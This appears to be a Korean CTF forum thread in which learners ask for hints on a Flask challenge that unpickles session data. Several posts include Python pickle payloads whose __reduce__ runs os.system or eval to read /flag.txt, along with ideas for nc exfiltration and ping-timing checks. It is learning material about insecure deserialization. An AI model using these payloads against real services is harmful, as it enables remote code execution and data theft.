pickle 취약점은 Unpickling을 할때 tuple을 반환해주시기 때문에 그 점을 이용해서 RCE를 할 수 있다고 검색을 통해서 공부 했습니다. 제가 문제에 접근 한 방법은 /flag.txt를 cat으로 읽기위해서 다음과 같은 코드를 작성했습니다. import pickle import os import base64 class TestClass: def reduce(self): return os.system, ("cat /flag.txt", ) ClassA = TestClass() ClassA_dump = base64.b64encode(pickle.dumps(ClassA)) print(ClassA_dump) print(pickle.loads(base64.b64decode(ClassA_dump))) 위 코드로 나온 base64데이터를 Checkseesion에 넣으니 cat /flag.txt라는 결과가 나왔지만 문제가 풀리지 않았는데 접근 방법이 아에 잘못된건가요? *추가로 로컬에서 /폴더에 flag.txt파일을 만들고 테스트 했을때는 읽혔습니다. ~

create_session을 하고 check_session을 하면 단순하게 문자열형태로만 exploit코드가 나타나구여... check_session에 직접적으로 exploit코드를 base64 인코딩을 해서 넣으면 500에러만 뜹니다... 여러가지를 시도해봤는데 잘안됩니다 다른질문을 보면 render_template을 덮으라고 하는게 이거는 무슨말인지 잘 모르겠어요 힌트좀 주세요~

취약점 이용해서 시스템 명령이 수행되는것 까지 확인이 됩니다. 확인방법은 ping -c 3 x.x.x.x , ping -c 10 x.x.x.x 이용해서 페이지 렌더링 시간 차이가 발생하는것 확인했구요 제가 하고자 하는 방향은 nc 이용해서 데이터 받아보기, flag 읽어서 템플릿에 쓰기 두가지 방향인데 두가지 모두다 안되고 있어서 서버환경설정에 문제가 있는지 여쭤봅니다. nc 명령이 수행되지 않음 -> nc를 원래 막아높은건지 여쭤봅니다. 템플릿 파일에 쓰기권한 없음 -> 파일에 쓰기권한이 없는것이 원래 의도한 건지 ? (2번의 경우 템플릿 상세경로 , 노출되어있는 /static/css 등 확실시 되는곳으로 테스트함)

import pickle import base64 import os class RCE: def reduce(self): cmd = "f = open('check_session.html', 'a').write(open('./flag.txt', 'r').read())" return (builtins.eval, (cmd,)) if name == 'main': pickled = pickle.dumps(RCE()) print(base64.b64encode(pickled)) 위와 같이 코드를 작성하고 프린트된 값을 그대로 check_session에 전달해 줬는데 계속 Internal Server Error에서 막힙니다. 혹시 제가 놓치고 있는 부분이 있을까요?? ㅠㅠ

취약점을 통해 flag.txt를 open 해서 eval로 출력을 시키려고 하면, 평범한 check_session페이지만 나옵니다. import('os').popen해도 똑같습니다. 제가 코드를 잘 못 작성한 탓인지 아니면 다른식의 접근법이 있는지 힌트좀 부탁드립니다

취약점을 이용해 render_template를 덮어서 FLAG변수를 출력하게끔 하려고했는데 한번 시도하고 난 이후로 계속 접속만 하면 500 Internal server error가 뜨네요 ㅠ 저렇게 하면 안되는 건가요 ㅠㅠ

reduce의 취약점을 이용해 함수를 사용하는 것 까지는 알겠는데 이후가 너무 어렵네요.. 뭔가 리다이렉트를 통해서 플래그를 얻는 을 수 있을 것 같은데.. 혹시 이런 방향이 맞나요??

name에다 os.system('ls') 하였더니 check_session에서 os.system 그래도 출력이 됩니다. return render_template('check_session.html', info=info) 이부분에서 매개변수로 전달된것은 문자열형태로 변환이 되어서 출력이 되는건가요? 그럴수도 있을것 같아서 다시 name에다 cos\nsystem\n(S'ls\ntR. 을 다시 주었지만 역시 코드 그대로 출력을 합니다. 또 다른 방법으로 import pickle import base64 import os class exploit: def reduce(self): str = "os.system('ls')" return (eval, (str,)) data = pickle.dumps(exploit()) data = base64.b64encode(data) print(data) 를 작성하고 base64로 엔코딩 한 값을 다시 name에다 주었지만 또 코드 그대로 출력합니다. 혹시 ssti를 할수 있을지 몰라 {{ info }} 등을 해보았지만 전혀 통하지 않습니다. 코드를 그대로 출력된다는점이 도저히 안풀립니다. 제가 방향을 잘못잡은건가요? pickle.loads 빼곤 특별한게 안보입니다.

문제 소스를 분석하고 취약점을 공부하는 과정에서 도저히 이해되지 않아서 그런데 혹시 힌트나 접근 방법에 대한 도움을 주실 수 있나요??

제가 문제풀면서 이해한게 맞는지 모르겠는데, 결국 pickle 모듈에서 사용하는 reduce() 메소드를 오버라이딩해서 원하는 객체+인자가 실행되도록 하는건가요?? 아니면, 이미 선언된 메소드에 객체+인자를 전달해서 실행시키는 건가요..? 그냥 template injection과 비슷한 느낌이라고 생각하면 될까요? reduce 메소드가 tuple을 반환할때 호출가능한 객체+인자 인 경우에는 그 결과값을 반환, 아니라면 pickle 되기전 값 그대로 반환 뭐가 맞는지 햇갈리네요..